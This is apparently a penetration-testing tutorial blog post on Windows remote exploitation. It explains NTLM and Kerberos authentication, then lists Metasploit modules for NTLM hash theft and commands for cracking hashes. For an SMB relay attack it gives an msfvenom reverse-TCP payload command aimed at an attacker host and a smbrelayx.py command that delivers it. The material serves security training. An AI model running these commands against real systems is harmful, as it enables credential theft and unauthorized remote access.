Windows Remote Exploitation

Introduction

In this blog post, we will learn the Windows Remote Exploitation Techniques and Approaches to engage with a target. We will also look for examples and usage of tools.

Some Approaches we have already discussed in Linux exploitation modules

Lower Hanging Fruits

We have discussed Low Hanging Fruits Approaches in Linux Exploitation module, the approach is also same for windows, please have a look on that blog post .

Remote Exploitation of Windows Network

The exploitation process in which attackers exploit’s listening services on the target network and tries to get access to the target system.

Windows Authentication

Windows uses two types of authentication protocols for clients and server authentication, NTLM and Kerberos.

NTLM

NTLM(New Technology LAN Manager) is the authentication protocol used on networks that include systems running the Windows operating system and on stand-alone systems.

How NTLM Works?

  1. A user accesses a client computer and provides a domain name, user name, and password. The client computes a cryptographic hash of the password and discards the actual password.

  2. The client sends the username to the server to authenticate itself.

  3. Then the server generates a 16-byte random number, called a challenge or nonce, and sends it to the requested client.

  4. After that client encrypts this challenge with the hash of the user’s password and sends the response of the result to the server.

  5. Then the server sends, user name, challenge sent to the client, the response received from the client, to the domain controller(Authentication Server).

  6. The domain controller uses the user name to retrieve the hash of the user’s password from the SAM (Security Account Manager) database. It uses this password hash to encrypt the challenge.

  7. Then DC compares the encrypted challenge it computed (in step 6) to the response computed by the client (in step 4). If they are identical, authentication is successful for the client system.

Check For More About NTLM

LM/NT hashes Explanation

Kerberos

Windows domains use Kerberos as the underlying protocol for SSO. A user can log on to the domain at the beginning of the workday, and the system uses the same credentials to access any resources in the domain. Kerberos is also used by Unix systems nowadays

How Kerberos Works?

  1. A user accesses a client computer sends an authentication request to the Kerberos server including user login ID.

  2. The authentication server reply including encrypted symmetric key and time-stamped ticket-granting ticket (TGT)

  3. Then the client sends a network authentication request including TGT and name of the target server, for example, MS Active Directory.

  4. After that Kerberos server reply including session ticket for use with the target server

  5. The client presents a time-stamped session ticket to the target server as the authentication

  6. Finally, the target server provides authentication back to the client.

Authentication Successful!!

Check For More About Kerberos

Also have a look at Windows Security Identifiers (SID) Important.

Some NTLM Stealing Metasploit Modules

auxiliary/admin/mssql/mssql_ntlm_stealer

auxiliary/admin/mssql/mssql_ntlm_stealer

Oracle SMB Relay Code Execution

auxiliary/admin/oracle/ora_ntlm_stealer

Host Information Enumeration via NTLM Authentication

auxiliary/scanner/http/ntlm_info_enumeration

SMTP NTLM Domain Extraction

auxiliary/scanner/smtp/smtp_ntlm_domain

WinRM Login Utility

This module attempts to authenticate to a WinRM service.

auxiliary/scanner/winrm/winrm_login

To crack NTLM hash

There are many techniques to crack NTLM hash

John Hashes Formats

john --format=netlm hashpwd_netntlm

Using Rainbow Tables To Crack Hash

rcracki_mt

Download rainbow tables

[http://project-rainbowcrack.com/table.htm] [http://ophcrack.sourceforge.net/tables.php]

rcracki_mt -h 1f548398f0f49ea1 -t 4 *.rti

  • -h: It is used to specify the first 8-bytes of the LMHASH
  • -t: It is the number of threads to use
  • *.rti: It is the path of the downloaded rainbow tables

** Suppose if you found only half of the password**

In ‘‘ls /usr/share/metasploit-framework/tools/password’’

There is a tool also which can also use for this purpose known as ruby halflm_second.rb.

ruby halflm_second.rb -n 1f548398f0f49ea18e2f0dcb9562b75eaa32e75aebf1d69c -p HALFPSWD

To convert the result into case sensitive password

perl netntlm.pl -file /root/hashpwd_netntlm -seed FULLHALFPSWD

SMBRelay Attack

Its a kind of Man in The Middle attack in which attacker relay SMB authentication requests to another host, gaining access to an authenticated SMB session if successful.

Metasploit Module for this purpose

msfconsole
use exploit windows/smb/smb_relay
msf5 exploit(windows/smb/smb_relay) > info

Read about this module by info command on Metasploit

Another Exploit for SMBRelay, Click Here

You can also use Impacket’s smbrelayx.py for this purpose.

smbrelayx.py: Exploit for CVE-2015-0005 using an SMB Relay Attack. If the target system is enforcing signing and a machine account was provided, the module will try to gather the SMB session key through NETLOGON.

Using Msfvenom create windows reverse TCP .exe payload in order to work with smbrelayx.py

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<AttackerIP> LPORT=<Port> -f exe -o hacker.exe

Start Metasploit Multi/handler in Attacker Machine set exploit/multi/handler Set the options and use smbrelayx.py

smbrelayx.py -h <TargetIP> -e /home/hacker.exe

To check and use other windows vulnerability’s exploit

Run command below in msfconsole

show exploits windows

Conclusion

We have discussed basic exploitation of windows systems, and we have already discussed some approaches in previous phases, Exploitation all depends on the previous phases of pentesting